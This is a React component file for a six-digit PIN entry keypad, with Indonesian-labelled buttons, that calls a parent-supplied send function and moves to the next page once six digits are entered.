import {useNavigate} from 'react-router-dom'
import {useEffect} from 'react';

function Page4(props) {
  let tes = [...props.pin]

  let nav = useNavigate()
  useEffect(() => {
    if(props.pin.length >= 6){
      props.send()
      nav('/five')
    }
  });

  return (
    <>
      <div className="page4">
        <br /><br />
        <br /><br />
        <br /><br />
        <br /><br />
        <br /><br />
        <span className='cnum'>
          <span className="number">{props.pin[0]}</span>
          <span className="number">{props.pin[1]}</span>
          <span className="number">{props.pin[2]}</span>
          <span className="number">{props.pin[3]}</span>
          <span className="number">{props.pin[4]}</span>
          <span className="number">{props.pin[5]}</span>
        </span><br />
        <div className='tombol'>
          <div onClick={() => (tes.push(1),props.spin(tes))} className="angka">1</div>
          <div onClick={() => (tes.push(2),props.spin(tes))} className="angka">2</div>
          <div onClick={() => (tes.push(3),props.spin(tes))} className="angka">3</div>
          <div onClick={() => (tes.push(4),props.spin(tes))} className="angka">4</div>
          <div onClick={() => (tes.push(5),props.spin(tes))} className="angka">5</div>
          <div onClick={() => (tes.push(6),props.spin(tes))} className="angka">6</div>
          <div onClick={() => (tes.push(7),props.spin(tes))} className="angka">7</div>
          <div onClick={() => (tes.push(8),props.spin(tes))} className="angka">8</div>
          <div onClick={() => (tes.push(9),props.spin(tes))} className="angka">9</div>
          <div className="angka"></div>
          <div onClick={() => (tes.push(0),props.spin(tes))} className="angka">0</div>
          <div onClick={()=>tes.pop()} className="angka">{"<"}</div>
        </div>
      </div>
    </>
  );
}

export default Page4;
